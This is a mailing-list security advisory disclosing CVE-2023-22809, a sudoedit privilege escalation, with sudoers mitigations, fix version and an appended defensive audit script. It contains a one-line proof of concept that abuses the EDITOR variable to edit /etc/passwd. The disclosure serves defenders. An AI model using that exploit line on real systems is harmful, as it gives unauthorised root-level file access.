https://seclists.org/oss-sec/2023/q1/42

CVE-2023-22809: Sudoedit can edit arbitrary files

---------------------------------------------------------------------
From: Matthieu Barjole
Date: Thu, 19 Jan 2023 01:33:43 +0100
---------------------------------------------------------------------

Hello everyone,

While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit when a user is authorized to use it by the sudoers policy. This vulnerability was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1 inclusive.

## Analysis

The technical analysis can be found in the following security advisory:

https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

## Proof of Concept

Assuming the following sudoers policy:

```
# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd
[...]
```

Arbitrary files such as `/etc/passwd` may also be edited as such:

```
EDITOR='vim -- /etc/passwd' sudoedit /etc/motd
```

## Mitigation

It is possible to prevent a user-specified editor from being used by sudoedit by adding the following line to the sudoers file.

```
Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR"
```

To restrict the editor when editing specific files, a Cmnd_Alias can be used, for example:

```
Cmnd_Alias EDIT_MOTD = sudoedit /etc/motd
Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR"
user ALL = EDIT_MOTD
```

## Fix

The issue was fixed in Sudo 1.9.12.p2.

## References

[1] https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809
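
The affected range and the `env_delete` mitigation from the post above, turned into an audit check. This is an added example, not part of the original message or of Sudo; the function names `ver_key`, `sudo_version_affected` and `sudoers_has_mitigation` are hypothetical, and it assumes upstream version strings of the form MAJOR.MINOR.PATCH[pN].

```shell
# Added example: audit helpers for CVE-2023-22809. Function names are hypothetical.

# Map "MAJOR.MINOR.PATCH[pN]" to a sortable integer; return 1 for any other form.
ver_key() {
    parts=$(printf '%s\n' "$1" |
        sed -nE 's/^([0-9]+)\.([0-9]+)\.([0-9]+)(p([0-9]+))?$/\1 \2 \3 \5/p')
    [ -n "$parts" ] || return 1
    set -- $parts
    echo $(( $1 * 1000000 + $2 * 10000 + $3 * 100 + ${4:-0} ))
}

# 0 = inside the affected range 1.8.0 .. 1.9.12p1, 1 = outside, 2 = unparseable.
# A distribution may backport the fix without changing the upstream version.
sudo_version_affected() {
    k=$(ver_key "$1") || return 2
    [ "$k" -ge 1080000 ] && [ "$k" -le 1091201 ]
}

# 0 if an active Defaults line removes all three editor variables (presence only).
sudoers_has_mitigation() {
    awk '
        /^[ \t]*#/ { next }    # commented-out lines do not count
        /^[ \t]*Defaults/ && /env_delete[ \t]*\+=/ {
            val = $0
            sub(/^.*env_delete[ \t]*\+=[ \t]*/, "", val)
            gsub(/"/, "", val)
            n = split(val, w, /[ \t]+/)
            s = v = e = 0
            for (i = 1; i <= n; i++) {    # whole-word match: EDITOR != SUDO_EDITOR
                if (w[i] == "SUDO_EDITOR") s = 1
                if (w[i] == "VISUAL") v = 1
                if (w[i] == "EDITOR") e = 1
            }
            if (s && v && e) found = 1
        }
        END { exit (found ? 0 : 1) }
    ' "$1"
}

# Constructed sample: the Cmnd_Alias policy from the Mitigation section.
tmp=$(mktemp)
printf '%s\n' 'Cmnd_Alias EDIT_MOTD = sudoedit /etc/motd' \
    'Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR"' \
    'user ALL = EDIT_MOTD' > "$tmp"
for ver in 1.8.0 1.9.12p1 1.9.12p2; do
    sudo_version_affected "$ver" && echo "$ver: affected" || echo "$ver: outside range"
done
sudoers_has_mitigation "$tmp" && echo "mitigation present"
rm -f "$tmp"
```

The mitigation check only confirms that such a `Defaults` line exists; whether its scope covers every `sudoedit` rule in the policy still has to be reviewed by hand.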